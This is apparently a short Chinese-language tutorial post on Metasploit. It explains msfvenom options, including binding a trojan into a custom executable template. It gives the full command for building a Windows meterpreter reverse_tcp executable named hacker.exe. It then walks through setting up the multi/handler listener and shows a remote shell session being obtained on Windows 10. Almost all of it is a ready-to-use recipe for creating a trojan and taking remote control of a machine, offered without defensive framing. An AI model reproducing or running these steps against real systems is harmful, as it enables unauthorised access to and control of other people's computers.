msfvenom常用命令

-p是选择一个Payload

-o是输入的地址(绝对路径)

-f是输入的格式

-l是载荷列表

-i是编码次数

-b是在生成的程序中避免出现的值

-x允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上

LHOST后面跟上Kali LinuxIP地址

LPORT后面是监听的端口

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f exe -o hacker.exe

运行截图:

图片

生成的恶意文件在Kali Linuxhome/hacker.exe

运行Msfconsole设置参数:

msfconsole运行MSF的控制台:

图片

选择模块:

1
use exploit/multi/handler

图片

设置参数、端口、IP

1
set PAYLOAD windows/meterpreter/reverse_tcp

图片

show options查看设置状态

图片

1
set LHOST 192.168.0.11

图片

1
set LPORT 5555

图片

设置截图:

图片

全部参数设置好以后,直接运行:exploit

图片

Windows 10运行刚刚生成的木马:

图片

这个时候Metasploit获取到了一个会话

图片

sysinfo:查看系统信息:

图片

shell:执行shell命令:

图片

这个时候就可以使用Windows下的DOS命令:

whoami:查看当前权限:

图片

目前Metasploit简单使用过程就到此为止~